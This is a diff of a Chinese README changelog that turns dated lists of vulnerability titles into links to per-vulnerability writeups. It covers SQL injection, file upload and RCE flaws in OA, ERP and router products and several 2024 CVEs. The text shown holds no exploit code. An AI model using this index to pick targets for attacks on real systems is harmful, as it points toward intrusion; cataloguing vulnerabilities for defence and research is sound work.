-- 用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞
-- 用友畅捷通CRM-create_site.phpSQL注入漏洞
-- MajorDoMo-thumb.php未授权RCE漏洞复现(CNVD-2024-02175)
-- 普元EOS-Platform-eos.jmx存在远程代码执行漏洞
-- 普元EOS-Platform-jmx.jmx存在远程代码执行漏洞(XVE-2023-24691)
-- 用友U8-Cloud-TableInputOperServlet存在反序列化漏洞
-- 湖南建研质量监测系统upload.ashx文件上传漏洞
-- 脸爱云一脸通智慧管理平台存在UpLoadPic.ashx文件上传漏洞
-- ZenML服务器远程权限提升漏洞(CVE-2024-25723)
-- WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698)
-- CrushFTP服务器端模板注入(CVE-2024-4040)
+- [通达OA-WHERE_STR存在前台SQL注入漏洞](./通达OA/通达OA-WHERE_STR存在前台SQL注入漏洞.md)
+- [用友GRP-U8-obr_zdybxd_check存在sql注入漏洞](./用友OA/用友GRP-U8-obr_zdybxd_check存在sql注入漏洞.md)
+- [用友畅捷通TPlus-InitServerInfo存在SQL注入漏洞](./用友OA/用友畅捷通TPlus-InitServerInfo存在SQL注入漏洞.md)
+- [用友畅捷通-TPlus-CheckMutex存在sql注入漏洞](./用友OA/用友畅捷通-TPlus-CheckMutex存在sql注入漏洞.md)
+- [用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞](./用友OA/用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞.md)
+- [用友畅捷通CRM-create_site.phpSQL注入漏洞](./用友OA/用友畅捷通CRM-create_site.phpSQL注入漏洞.md)
+- [MajorDoMo-thumb.php未授权RCE漏洞复现(CNVD-2024-02175)](./MajorDoMo/MajorDoMo-thumb.php未授权RCE漏洞复现(CNVD-2024-02175).md)
+- [普元EOS-Platform-eos.jmx存在远程代码执行漏洞](./普元EOS-Platform/普元EOS-Platform-eos.jmx存在远程代码执行漏洞.md)
+- [普元EOS-Platform-jmx.jmx存在远程代码执行漏洞(XVE-2023-24691)](./普元EOS-Platform/普元EOS-Platform-jmx.jmx存在远程代码执行漏洞(XVE-2023-24691).md)
+- [用友U8-Cloud-TableInputOperServlet存在反序列化漏洞](./用友OA/用友U8-Cloud-TableInputOperServlet存在反序列化漏洞.md)
+- [湖南建研质量监测系统upload.ashx文件上传漏洞](./湖南建研检测系统/湖南建研质量监测系统upload.ashx文件上传漏洞.md)
+- [脸爱云一脸通智慧管理平台存在UpLoadPic.ashx文件上传漏洞](./脸爱云一脸通智慧管理平台/脸爱云一脸通智慧管理平台存在UpLoadPic.ashx文件上传漏洞.md)
+- [ZenML服务器远程权限提升漏洞(CVE-2024-25723)](./ZenML/ZenML服务器远程权限提升漏洞(CVE-2024-25723).md)
+- [WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698)](./WordPress/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md)
+- [CrushFTP服务器端模板注入(CVE-2024-4040)](./CrushFTP/CrushFTP服务器端模板注入(CVE-2024-4040).md)
 
 ## 2024.04.23 新增漏洞
-- 网动统一通信平台ActiveUC存在任意文件下载漏洞
-- 锐捷校园网自助服务系统operatorReportorRoamService存在SQL注入漏洞
-- 用友政务财务系统FileDownload存在任意文件读取漏洞
-- F-logic_DataCube3存在SQL注入漏洞(CVE-2024-31750)
-- 用友移动系统管理uploadApk接口存在任意文件上传
-- 泛微e-office系统UserSelect接口存在未授权访问漏洞
-- WIFISKY-7层流控路由器confirm.php接口处存在RCE漏洞
-- 泛微E-Office-uploadfile.php任意文件上传漏洞
-- 宏景HCM系统infoView处存在sql注入漏洞
-- 卡车卫星定位系统create存在未授权密码重置漏洞
-- 脸爱云一脸通智慧管理平台存在downloads.aspx信息泄露漏洞
-- 脸爱云一脸通智慧平台SelOperators信息泄露漏洞
-- 禅道项目管理系统身份认证绕过漏洞
+- [网动统一通信平台ActiveUC存在任意文件下载漏洞](./网动统一通信平台/网动统一通信平台ActiveUC存在任意文件下载漏洞.md)
+- [锐捷校园网自助服务系统operatorReportorRoamService存在SQL注入漏洞](./锐捷/锐捷校园网自助服务系统operatorReportorRoamService存在SQL注入漏洞.md)
+- [用友政务财务系统FileDownload存在任意文件读取漏洞](./用友OA/用友政务财务系统FileDownload存在任意文件读取漏洞.md)
+- [F-logic_DataCube3存在SQL注入漏洞(CVE-2024-31750)](./F%20logic%20DataCube3/F-logic_DataCube3存在SQL注入漏洞(CVE-2024-31750).md)
+- [用友移动系统管理uploadApk接口存在任意文件上传](./用友OA/用友移动系统管理uploadApk接口存在任意文件上传.md)
+- [泛微e-office系统UserSelect接口存在未授权访问漏洞](./泛微OA/泛微e-office系统UserSelect接口存在未授权访问漏洞.md)
+- [WIFISKY-7层流控路由器confirm.php接口处存在RCE漏洞](./路由器/WIFISKY-7层流控路由器confirm.php接口处存在RCE漏洞.md)
+- [泛微E-Office-uploadfile.php任意文件上传漏洞](./泛微OA/泛微E-Office-uploadfile.php任意文件上传漏洞.md)
+- [宏景HCM系统infoView处存在sql注入漏洞](./宏景OA/宏景HCM系统infoView处存在sql注入漏洞.md)
+- [卡车卫星定位系统create存在未授权密码重置漏洞](./卡车卫星定位系统/卡车卫星定位系统create存在未授权密码重置漏洞.md)
+- [脸爱云一脸通智慧管理平台存在downloads.aspx信息泄露漏洞](./脸爱云一脸通智慧管理平台/脸爱云一脸通智慧管理平台存在downloads.aspx信息泄露漏洞.md)
+- [脸爱云一脸通智慧平台SelOperators信息泄露漏洞](./脸爱云一脸通智慧管理平台/脸爱云一脸通智慧平台SelOperators信息泄露漏洞.md)
+- [禅道项目管理系统身份认证绕过漏洞](./禅道/禅道项目管理系统身份认证绕过漏洞.md)
 
 ## 2024.04.19 新增漏洞
-- 用友U8GRP-fastjson
-- 云时空社会化商业ERP系统validateLoginName接口处存在SQL注入漏洞
-- Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852)
-- IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103)
-- 用友GRP-U8-operOriztion存在SQL注入漏洞
-- 时空智友企业流程化管控系统formservice存在SQL注入漏洞
-- 泛微E-Office-jx2_config存在信息泄露漏洞
-- 泛微E-Mobile-messageType.do存在命令执行漏洞
-- 润乾报表dataSphereServlet任意文件上传
-- 若依后台定时任务存在SSRF漏洞
-- 用友NC-showcontent接口存在sql注入漏洞
+- [用友U8GRP-fastjson](./用友OA/用友U8GRP-fastjson漏洞.md)
+- [云时空社会化商业ERP系统validateLoginName接口处存在SQL注入漏洞](./云时空/云时空社会化商业ERP系统validateLoginName接口处存在SQL注入漏洞.md)
+- [Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852)](./Linksys/Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852).md)
+- [IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103)](./IP%20guard%20WebServer/IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103).md)
+- [用友GRP-U8-operOriztion存在SQL注入漏洞](./用友OA/用友GRP-U8-operOriztion存在SQL注入漏洞.md)
+- [时空智友企业流程化管控系统formservice存在SQL注入漏洞](./云时空/时空智友企业流程化管控系统formservice存在SQL注入漏洞.md)
+- [泛微E-Office-jx2_config存在信息泄露漏洞](./泛微OA/泛微E-Office-jx2_config存在信息泄露漏洞.md)
+- [泛微E-Mobile-messageType.do存在命令执行漏洞](./泛微OA/泛微E-Mobile-messageType.do存在命令执行漏洞.md)
+- [润乾报表dataSphereServlet任意文件上传](./润乾报表/润乾报表dataSphereServlet任意文件上传.md)
+- [若依后台定时任务存在SSRF漏洞](./RuoYi/若依后台定时任务存在SSRF漏洞.md)
+- [用友NC-showcontent接口存在sql注入漏洞](./用友OA/用友NC-showcontent接口存在sql注入漏洞.md)
 
 ## 2024.04.16 新增漏洞
-- 网康科技NS-ASG应用安全网关add_ikev2.php存在SQL注入漏洞
-- 网康科技NS-ASG应用安全网关config_ISCGroupNoCache.php存在SQL注入漏洞
-- 网康科技NS-ASG应用安全网关config_Anticrack.php存在SQL注入漏洞
-- 网康科技NS-ASG应用安全网关add_postlogin.php存在SQL注入漏洞
-- 广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞
-- 用友NC-uploadControl接口存在文件上传漏洞
-- SpringBlade框架dict-biz接口存在sql注入漏洞
-- 通天星CMSV6车载视频监控平台downloadLogger接口任意文件读取漏洞
-- Progress-Flowmon命令注入漏洞(CVE-2024-2389)
-- kkFileView-v4.3.0-RCE
-- draytek路由器addrouting命令执行漏洞
-- 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞
-- 富通天下外贸ERP任意文件上传漏洞
-- 用友NC_grouptemplet文件上传漏洞
-- 用友NC-avatar接口存在文件上传漏洞
-- PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400)
+- [网康科技NS-ASG应用安全网关add_ikev2.php存在SQL注入漏洞](./网康科技/网康科技NS-ASG应用安全网关add_ikev2.php存在SQL注入漏洞.md)
+- [网康科技NS-ASG应用安全网关config_ISCGroupNoCache.php存在SQL注入漏洞](./网康科技/网康科技NS-ASG应用安全网关config_ISCGroupNoCache.php存在SQL注入漏洞.md)
+- [网康科技NS-ASG应用安全网关config_Anticrack.php存在SQL注入漏洞](./网康科技/网康科技NS-ASG应用安全网关config_Anticrack.php存在SQL注入漏洞.md)
+- [网康科技NS-ASG应用安全网关add_postlogin.php存在SQL注入漏洞](./网康科技/网康科技NS-ASG应用安全网关add_postlogin.php存在SQL注入漏洞.md)
+- [广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞](./广州图创图书馆集群管理系统/广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞.md)
+- [用友NC-uploadControl接口存在文件上传漏洞](./用友OA/用友NC-uploadControl接口存在文件上传漏洞.md)
+- [SpringBlade框架dict-biz接口存在sql注入漏洞](./SpringBlade/SpringBlade框架dict-biz接口存在sql注入漏洞.md)
+- [通天星CMSV6车载视频监控平台downloadLogger接口任意文件读取漏洞](./通天星/通天星CMSV6车载视频监控平台downloadLogger接口任意文件读取漏洞.md)
+- [Progress-Flowmon命令注入漏洞(CVE-2024-2389)](./Progress/Progress-Flowmon命令注入漏洞(CVE-2024-2389).md)
+- [kkFileView-v4.3.0-RCE](./kkFileView/kkFileView-v4.3.0-RCE.md)
+- [draytek路由器addrouting命令执行漏洞](./路由器/draytek路由器addrouting命令执行漏洞.md)
+- [飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞](./飞企互联/飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md)
+- [富通天下外贸ERP任意文件上传漏洞](./富通天下外贸ERP/富通天下外贸ERP任意文件上传漏洞.md)
+- [用友NC_grouptemplet文件上传漏洞](./用友OA/用友NC_grouptemplet文件上传漏洞.md)
+- [用友NC-avatar接口存在文件上传漏洞](./用友OA/用友NC-avatar接口存在文件上传漏洞.md)
+- [PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400)](./PAN-OS/PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400).md)
   
 ## 2024.04.12 新增漏洞
-- 新视窗新一代物业管理系统任意文件上传漏洞
-- Telesquare路由器RCE(CVE-2024-29269)
-- 物业专项维修资金管理系统漏洞
-- 用友NC-ActionServlet存在SQL注入漏洞
-- 潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞
-- OpenMetadata命令执行(CVE-2024-28255)
-- 魔方网表mailupdate.jsp接口存在任意文件上传漏洞
-- 奇安信VPN任意用户密码重置
-- 润乾报表平台InputServlet存在任意文件读取漏洞
-- 医院一站式后勤管理系统processApkUpload.upload存在任意文件上传漏洞
+- [新视窗新一代物业管理系统任意文件上传漏洞](./新视窗新一代物业管理系统/新视窗新一代物业管理系统任意文件上传漏洞.md)
+- [Telesquare路由器RCE(CVE-2024-29269)](./路由器/Telesquare路由器RCE(CVE-2024-29269).md)
+- [物业专项维修资金管理系统漏洞](./物业专项维修资金管理系统/物业专项维修资金管理系统漏洞.md)
+- [用友NC-ActionServlet存在SQL注入漏洞](./用友OA/用友NC-ActionServlet存在SQL注入漏洞.md)
+- [潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞](./潍微科技/潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞.md)
+- [OpenMetadata命令执行(CVE-2024-28255)](./OpenMetadata/OpenMetadata命令执行(CVE-2024-28255).md)
+- [魔方网表mailupdate.jsp接口存在任意文件上传漏洞](./魔方网表/魔方网表mailupdate.jsp接口存在任意文件上传漏洞.md)
+- [奇安信VPN任意用户密码重置](./天擎/奇安信VPN任意用户密码重置.md)
+- [润乾报表平台InputServlet存在任意文件读取漏洞](./润乾报表/润乾报表平台InputServlet存在任意文件读取漏洞.md)
+- [医院一站式后勤管理系统processApkUpload.upload存在任意文件上传漏洞](./医院一站式后勤管理系统/医院一站式后勤管理系统processApkUpload.upload存在任意文件上传漏洞.md)
 
 ## 2024.04.10 新增漏洞
-- 泛微E-Mobile-client.do存在命令执行漏洞
-- 致远互联-OA前台fileUpload.do存在绕过文件上传漏洞
-- 宏景eHR人力资源管理软件showmediainfo存在SQL注入漏洞
-- 用友NC接口PaWfm存在sql注入漏洞
-- 用友NC接口ConfigResourceServlet存在反序列漏洞
-- 用友NC-runStateServlet接口存在SQL注入漏洞
-- 用友NC-workflowImageServlet接口存在sql注入漏洞
-- 畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞
-- 畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞
-- H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598)
-- 用友NC_saveImageServlet接口存在文件上传漏洞
-- 泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞
-- 用友crm-swfupload接口存在任意文件上传漏洞
+- [泛微E-Mobile-client.do存在命令执行漏洞](./泛微OA/泛微E-Mobile-client.do存在命令执行漏洞.md)
+- [致远互联-OA前台fileUpload.do存在绕过文件上传漏洞](./致远OA/致远互联-OA前台fileUpload.do存在绕过文件上传漏洞.md)
+- [宏景eHR人力资源管理软件showmediainfo存在SQL注入漏洞](./宏景OA/宏景eHR人力资源管理软件showmediainfo存在SQL注入漏洞.md)
+- [用友NC接口PaWfm存在sql注入漏洞](./用友OA/用友NC接口PaWfm存在sql注入漏洞.md)
+- [用友NC接口ConfigResourceServlet存在反序列漏洞](./用友OA/用友NC接口ConfigResourceServlet存在反序列漏洞.md)
+- [用友NC-runStateServlet接口存在SQL注入漏洞](./用友OA/用友NC-runStateServlet接口存在SQL注入漏洞.md)
+- [用友NC-workflowImageServlet接口存在sql注入漏洞](./用友OA/用友NC-workflowImageServlet接口存在sql注入漏洞.md)
+- [畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞](./用友OA/畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞.md)
+- [畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞](./用友OA/畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞.md)
+- [H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598)](./H3C/H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598).md)
+- [用友NC_saveImageServlet接口存在文件上传漏洞](./用友OA/用友NC_saveImageServlet接口存在文件上传漏洞.md)
+- [泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞](./泛微OA/泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞.md)
+- [用友crm-swfupload接口存在任意文件上传漏洞](./用友OA/用友crm-swfupload接口存在任意文件上传漏洞.md)
 
 ## 2024.04.06 新增漏洞
-- 用友U9-PatchFile.asmx接口存在任意文件上传漏洞
-- 用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞
-- 亿赛通DecryptApplicationService2接口任意文件上传
-- 亿赛通update接口sql注入
-- 用友U8cloud接口MeasureQueryByToolAction存在SQL注入漏洞
-- 浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入
-- 科荣AIO-ReadFile存在任意文件读取漏洞
-- 东方通TongWeb-selectApp.jsp存在任意文件上传
-- WordPress-js-support-ticket存在文件上传漏洞
-- WordPress-thimpress_hotel_booking存在代码执行漏洞
-- 万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞
-- 用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞
-- JeePlus低代码开发平台存在SQL注入漏洞
-- 润乾报表InputServlet接口存在文件上传漏洞
-- D-Link-NAS(CVE-2024-3272&&CVE-2024-3273)
+- [用友U9-PatchFile.asmx接口存在任意文件上传漏洞](./用友OA/用友U9-PatchFile.asmx接口存在任意文件上传漏洞.md)
+- [用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞](./用友OA/用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞.md)
+- [亿赛通DecryptApplicationService2接口任意文件上传](./亿赛通电子文档安全管理系统/亿赛通DecryptApplicationService2接口任意文件上传.md)
+- [亿赛通update接口sql注入](./亿赛通电子文档安全管理系统/亿赛通update接口sql注入.md)
+- [用友U8cloud接口MeasureQueryByToolAction存在SQL注入漏洞](./用友OA/用友U8cloud接口MeasureQueryByToolAction存在SQL注入漏洞.md)
+- [浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入](./浙大恩特客户资源管理系统/浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入.md)
+- [科荣AIO-ReadFile存在任意文件读取漏洞](./科荣AIO/科荣AIO-ReadFile存在任意文件读取漏洞.md)
+- [东方通TongWeb-selectApp.jsp存在任意文件上传](./东方通/东方通TongWeb-selectApp.jsp存在任意文件上传.md)
+- [WordPress-js-support-ticket存在文件上传漏洞](./WordPress/WordPress-js-support-ticket存在文件上传漏洞.md)
+- [WordPress-thimpress_hotel_booking存在代码执行漏洞](./WordPress/WordPress-thimpress_hotel_booking存在代码执行漏洞.md)
+- [万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞](./万户OA/万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞.md)
+- [用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞](./用友OA/用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞.md)
+- [JeePlus低代码开发平台存在SQL注入漏洞](./JeePlus低代码开发平台/JeePlus低代码开发平台存在SQL注入漏洞.md)
+- [润乾报表InputServlet接口存在文件上传漏洞](./润乾报表/润乾报表InputServlet接口存在文件上传漏洞.md)
+- [D-Link-NAS(CVE-2024-3272&&CVE-2024-3273)](./D-Link/D-Link-NAS(CVE-2024-3272&&CVE-2024-3273).md)
 
 ## 2024.03.29 新增漏洞
-- 泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞
-- 用友NC接口saveXmlToFIleServlet存在文件上传
-- TP-Link-ER7206存在命令注入漏洞
-- JumpServer(CVE-2024-29201)远程代码执行漏洞&(CVE-2024-29202)Jinin2模板注入漏洞
-- 用友U8-Cloud接口FileManageServlet存在反序列漏洞
-- 用友U8-Cloud接口ServiceDispatcherServlet存在反序列漏洞
-- 泛微e-cology接口getLabelByModule存在sql注入漏洞
-- WordPress_LayerSlider插件SQL注入漏洞(CVE-2024-2879)
+- [泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞](./泛微OA/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md)
+- [用友NC接口saveXmlToFIleServlet存在文件上传](./用友OA/用友NC接口saveXmlToFIleServlet存在文件上传.md)
+- [TP-Link-ER7206存在命令注入漏洞](./路由器/TP-Link-ER7206存在命令注入漏洞.md)
+- [JumpServer(CVE-2024-29201)远程代码执行漏洞&(CVE-2024-29202)Jinin2模板注入漏洞](./JumpServer/JumpServer(CVE-2024-29201)远程代码执行漏洞&(CVE-2024-29202)Jinin2模板注入漏洞.md)
+- [用友U8-Cloud接口FileManageServlet存在反序列漏洞](./用友OA/用友U8-Cloud接口FileManageServlet存在反序列漏洞.md)
+- [用友U8-Cloud接口ServiceDispatcherServlet存在反序列漏洞](./用友OA/用友U8-Cloud接口ServiceDispatcherServlet存在反序列漏洞.md)
+- [泛微e-cology接口getLabelByModule存在sql注入漏洞](./泛微OA/泛微e-cology接口getLabelByModule存在sql注入漏洞.md)
+- [WordPress_LayerSlider插件SQL注入漏洞(CVE-2024-2879)](./WordPress/WordPress_LayerSlider插件SQL注入漏洞(CVE-2024-2879).md)
 
 ## 2024.03.28 新增漏洞
-- 通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞
-- 用友U8-Cloud接口FileServlet存在任意文件读取漏洞
-- 联达OA-UpLoadFile.aspx存在任意文件上传漏洞
-- 协达OA系统绕过登录认证登陆后台
-- 用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞
-- 金石工程项目管理系统TianBaoJiLu.aspx存在SQL注入漏洞
-- 易宝OA-BasicService.asmx存在任意文件上传漏洞
-- WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954)
-- 商混ERP-DictionaryEdit.aspxSQL注入漏洞
+- [通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞](./通天星/通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞.md)
+- [用友U8-Cloud接口FileServlet存在任意文件读取漏洞](./用友OA/用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md)
+- [联达OA-UpLoadFile.aspx存在任意文件上传漏洞](./联达OA/联达OA-UpLoadFile.aspx存在任意文件上传漏洞.md)
+- [协达OA系统绕过登录认证登陆后台](./协达OA/协达OA系统绕过登录认证登陆后台.md)
+- [用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞](./用友OA/用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞.md)
+- [金石工程项目管理系统TianBaoJiLu.aspx存在SQL注入漏洞](./金石工程项目管理系统/金石工程项目管理系统TianBaoJiLu.aspx存在SQL注入漏洞.md)
+- [易宝OA-BasicService.asmx存在任意文件上传漏洞](./易宝OA/易宝OA-BasicService.asmx存在任意文件上传漏洞.md)
+- [WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954)](./WordPress/WordPress%20Automatic%20Plugin任意文件下载漏洞(CVE-2024-27954).md)
+- [商混ERP-DictionaryEdit.aspxSQL注入漏洞](./商混ERP/商混ERP-DictionaryEdit.aspxSQL注入漏洞.md)
   
 ## 2024.03.27 新增漏洞
-- Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767
-- Fortinet-SSL-VPN-CVE-2024-21762
-- omfyUI follow_symlinks文件读取漏洞
-- Fortra FileCatalyst Workflow远程代码执行漏漏洞(CVE-2024-25153)
-- 联达OA uploadLogo.aspx存在任意文件上传
-- 网络验证系统getInfo参数存在SQL注入漏洞
-- 致远OA-ucpcLogin密码重置漏洞
-- Cobbler存在远程命令执行漏洞(CVE-2021-40323)
-- 锐捷网络无线AC命令执行
+- [Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767](./Adobe%20ColdFusion/Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767.md)
+- [Fortinet-SSL-VPN-CVE-2024-21762](./Fortinet/Fortinet-SSL-VPN-CVE-2024-21762.md)
+- [omfyUI follow_symlinks文件读取漏洞](./omfyUI/omfyUI%20follow_symlinks文件读取漏洞.md)
+- [Fortra FileCatalyst Workflow远程代码执行漏漏洞(CVE-2024-25153)](./Fortra/Fortra%20FileCatalyst%20Workflow远程代码执行漏漏洞(CVE-2024-25153).md)
+- [联达OA uploadLogo.aspx存在任意文件上传](./联达OA/联达OA%20uploadLogo.aspx存在任意文件上传.md)
+- [网络验证系统getInfo参数存在SQL注入漏洞](./网络验证系/网络验证系统getInfo参数存在SQL注入漏洞.md)
+- [致远OA-ucpcLogin密码重置漏洞](./致远OA/致远OA-ucpcLogin密码重置漏洞.md)
+- [Cobbler存在远程命令执行漏洞(CVE-2021-40323)](./Cobbler/Cobbler存在远程命令执行漏洞(CVE-2021-40323).md)
+- [锐捷网络无线AC命令执行](./锐捷/锐捷网络无线AC命令执行.md)
   
 ## 2024.03.24 新增漏洞
-- 飞企互联-FE企业运营管理平台uploadAttachmentServlet存在任意文件上传漏洞
-- Netgear路由器boardDataWW.php存在RCE漏洞
-- 瑞友应用虚拟化系统-RAPAgent存在命令执行漏洞
-- 福建科立讯通信指挥调度平台get_extension_yl.php存在sql注入漏洞
-- 用友畅捷通RRATableController存在反序列化漏洞
-- 用友时空KSOA-imagefield接口存在SQL注入漏洞
-- F-logic_DataCube3存在任意文件上传漏洞
-- 泛微getE9DevelopAllNameValue2接口存在任意文件读取漏洞
-- 大华DSS城市安防监控平台Struct2-045命令执行漏洞
+- [飞企互联-FE企业运营管理平台uploadAttachmentServlet存在任意文件上传漏洞](./飞企互联/飞企互联-FE企业运营管理平台uploadAttachmentServlet存在任意文件上传漏洞.md)
+- [Netgear路由器boardDataWW.php存在RCE漏洞](./路由器/Netgear路由器boardDataWW.php存在RCE漏洞.md)
+- [瑞友应用虚拟化系统-RAPAgent存在命令执行漏洞](./瑞友天翼应用虚拟化系统/瑞友应用虚拟化系统-RAPAgent存在命令执行漏洞.md)
+- [福建科立讯通信指挥调度平台get_extension_yl.php存在sql注入漏洞](./福建科立讯通信/福建科立讯通信指挥调度平台get_extension_yl.php存在sql注入漏洞.md)
+- [用友畅捷通RRATableController存在反序列化漏洞](./用友OA/用友畅捷通RRATableController存在反序列化漏洞.md)
+- [用友时空KSOA-imagefield接口存在SQL注入漏洞](./用友OA/用友时空KSOA-imagefield接口存在SQL注入漏洞.md)
+- [F-logic_DataCube3存在任意文件上传漏洞](./F%20logic%20DataCube3/F-logic_DataCube3存在任意文件上传漏洞.md)
+- [泛微getE9DevelopAllNameValue2接口存在任意文件读取漏洞](./泛微OA/泛微getE9DevelopAllNameValue2接口存在任意文件读取漏洞.md)
+- [大华DSS城市安防监控平台Struct2-045命令执行漏洞](./大华/大华DSS城市安防监控平台Struct2-045命令执行漏洞.md)
 
 ## 2024.03.20 新增漏洞
-- 飞鱼星上网行为管理系统企业版前台RCE
-- WordPress_Wholesale_Market插件存在任意文件读取漏洞
-- 万户ezOFFICE-contract_gd.jsp存在SQL注入漏洞
-- 宏景eHR-report_org_collect_tree.jsp存在SQL注入漏洞
-- 正方教学管理信息服务平台ReportServer存在任意文件读取漏洞
-- 金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞
-- 大华DSS数字监控系统attachment_clearTempFile.action存在SQL注入漏洞
-- 用友NCCloud系统runScript存在SQL注入漏洞
+- [飞鱼星上网行为管理系统企业版前台RCE](./飞鱼星/飞鱼星上网行为管理系统企业版前台RCE.md)
+- [WordPress_Wholesale_Market插件存在任意文件读取漏洞](./WordPress/WordPress_Wholesale_Market插件存在任意文件读取漏洞.md)
+- [万户ezOFFICE-contract_gd.jsp存在SQL注入漏洞](./万户OA/万户ezOFFICE-contract_gd.jsp存在SQL注入漏洞.md)
+- [宏景eHR-report_org_collect_tree.jsp存在SQL注入漏洞](./宏景OA/宏景eHR-report_org_collect_tree.jsp存在SQL注入漏洞.md)
+- [正方教学管理信息服务平台ReportServer存在任意文件读取漏洞](./正方/正方教学管理信息服务平台ReportServer存在任意文件读取漏洞.md)
+- [金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞](./金和OA/金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md)
+- [大华DSS数字监控系统attachment_clearTempFile.action存在SQL注入漏洞](./大华/大华DSS数字监控系统attachment_clearTempFile.action存在SQL注入漏洞.md)
+- [用友NCCloud系统runScript存在SQL注入漏洞](./用友OA/用友NCCloud系统runScript存在SQL注入漏洞.md)
   
 ## 2024.03.14 新增漏洞
-- 亿赛通-数据泄露防护(DLP)ClientAjax接口存在任意文件读取漏洞
-- 亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞
-- 金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞
-- 用友U8_Cloud-base64存在SQL注入漏洞
-- 大华智慧园区综合管理平台pageJson存在SQL注入漏洞
-- 金蝶云-星空ServiceGateway反序列化漏洞
-- 友点建站系统image_upload.php存在文件上传漏洞
-- D-Link_DAR-8000操作系统命令注入漏洞(CVE-2023-4542)
-- D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154)
-- 中成科信票务管理平台任意文件上传漏洞
-- Springblade默认密钥可伪造凭据
-- CERIO-DT系列路由器Save.cgi接口存在命令执行漏洞
+- [亿赛通-数据泄露防护(DLP)ClientAjax接口存在任意文件读取漏洞](./亿赛通电子文档安全管理系统/亿赛通-数据泄露防护(DLP)ClientAjax接口存在任意文件读取漏洞.md)
+- [亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞.md)
+- [金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞](./金和OA/金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞.md)
+- [用友U8_Cloud-base64存在SQL注入漏洞](./用友OA/用友U8_Cloud-base64存在SQL注入漏洞.md)
+- [大华智慧园区综合管理平台pageJson存在SQL注入漏洞](./大华/大华智慧园区综合管理平台pageJson存在SQL注入漏洞.md)
+- [金蝶云-星空ServiceGateway反序列化漏洞](./金蝶/金蝶云-星空ServiceGateway反序列化漏洞.md)
+- [友点建站系统image_upload.php存在文件上传漏洞](./友点建站系统/友点建站系统image_upload.php存在文件上传漏洞.md)
+- [D-Link_DAR-8000操作系统命令注入漏洞(CVE-2023-4542)](./D-Link/D-Link_DAR-8000操作系统命令注入漏洞(CVE-2023-4542).md)
+- [D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154)](./D-Link/D-Link_DAR-8000-10上网行为审计网关任意文件上传漏洞(CVE-2023-5154).md)
